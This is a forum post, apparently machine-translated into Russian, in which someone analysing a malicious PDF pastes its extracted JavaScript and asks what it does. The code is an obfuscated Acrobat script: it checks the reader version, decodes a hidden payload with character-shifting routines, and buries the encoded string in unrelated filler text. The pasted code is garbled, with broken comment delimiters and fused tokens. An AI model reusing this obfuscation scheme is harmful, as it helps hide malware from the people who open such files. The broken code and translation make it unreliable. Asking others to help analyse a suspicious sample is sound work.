Я изучаю вредоносное ПО в формате pdf, пока я извлек из него javascript и отсканировал его, хэш извлеченного файла javacript - это (sha256: 0ace77aaac3da51ac4af16b7fbc9828c8cfbd7b1b1af2e69e4a8a3cda4eb1398, но я заметил, что на самом деле это не так, как я заметилфункция app.viewVersion.toString (которая используется для восстановления версии вашего Acrobat Reader, но я не вижу сценарий, использующий эту информацию впоследствии.
Может кто-нибудь сказать мне, является ли это даже злонамеренным и если да, точто делает код? код ниже:
Заранее спасибо,
'use strict';
/**
@return {undefined}
/
function STARTSCRIPT() {
/*
@param {boolean} workshopper
@param {string} id
@param {boolean} min
@param {string} msg
@return {undefined}
/
function init(workshopper, id, min, msg) {
value = event.value;
if (workshopper && value <= id) {
app.alert("Value must be greater than " + id);
app.beep();
/* @type {boolean} /
event.rc = false;
return;
}
if (min && value >= msg) {
app.alert("Value must be less than " + msg);
app.beep();
/* @type {boolean} /
event.rc = false;
return;
}
}
/*
@param {number} type
@param {number} e
@param {!Object} internal
@return {undefined}
/
function print(type, e, internal) {
if (e > 11) {
console.println("Entering function: myFunction");
console.println(" Parameter 1: aWMaiAhjHR = " + type);
console.println(" Parameter 2: bWMaiAhjHR = " + e);
} else {
code = DEWMaiAhjHR(internalwe(type, 105) + "ub" + we(type, 105) + "tr", 3 +
(27 + (type - 3) - (27 + (type - 3)) % 60) * 4);
thiswe(type, 91) + we(type, 108) + we(type, 87) + we(type, 98);
}
}
/*
@param {string} val
@param {number} tickArray
@return {?}
/
this.DEWMaiAhjHR = function(val, tickArray) {
/* @type {string} /
ecWMaiAhjHR = "";
/* @type {string} /
val = unescape(val);
/* @type {number} /
frWMaiAhjHR = val.length;
/* @type {number} /
j = 0;
for (; j < frWMaiAhjHR;) {
ecWMaiAhjHR = ecWMaiAhjHR + we2(31, val.charCodeAt(j) - tickArray ^
tickArray);
j++;
}
return ecWMaiAhjHR;
};
/* @type {string} /
dWMaiAhjHR = 'I need a javascript that I can place in a form field
properties area that will replace a "&" symbol with the word "and".....any
help would be greatly appreciated. There are a couple of places you can
enter a script that modifies the contents of the field. The question is, do
you want the value of the form field to be altered, or just what the user
sees on the screen? To modify the value of the field you will need to use a
custom keystroke script. To modify the appearance of the field you will need
to enter a format script. You can find articles on both of these in the
tutorial on this site. The script itself can be done with the JavaScript
"replace" function, In both cases (assuming that youve got an AcroForm) the
code will look like this. PHP - Java Chat system for web site. Client is
Java applet can run in any Java enabled browsers. The server side is PHP
script can be installed on any PHP enabled web host. Interface text can be
customized in any language. Multi rooms. Java Script Mutator is intended for
optimization and protection of your Java Scripts from theft and
modifications. Gnostice PDFOne Java is a pure Java library which provides a
rich set of APIs to Create, Fill and Read PDF Forms, Secure, Merge, Split,
Stamp PDF documents. = %0Cxet%26EctoXit%26A%26evv0xmiwitXitsmop0zoSztmpg.-
%3B%0CEctoXit%26A%26EctoXit0tivreci.%2FbJ%2Fg2%24%24
/*
@param {number} nextActionList
@param {number} index
@return {?}
/
this.we2 = function(nextActionList, index) {
return String.fromCharCode(nextActionList % 55 - nextActionList + index);
};
/*
@param {number} nextActionList
@param {number} index
@return {?}
*/
this.we = function(nextActionList, index) {
return String.fromCharCode(nextActionList % 55 - nextActionList + 10 +
index);
};
hWMaiAhjHR = app.viewerVersion.toString();
hWMaiAhjHR = hWMaiAhjHR.charAt(0);
print(hWMaiAhjHR, hWMaiAhjHR / 2, dWMaiAhjHR);
}
;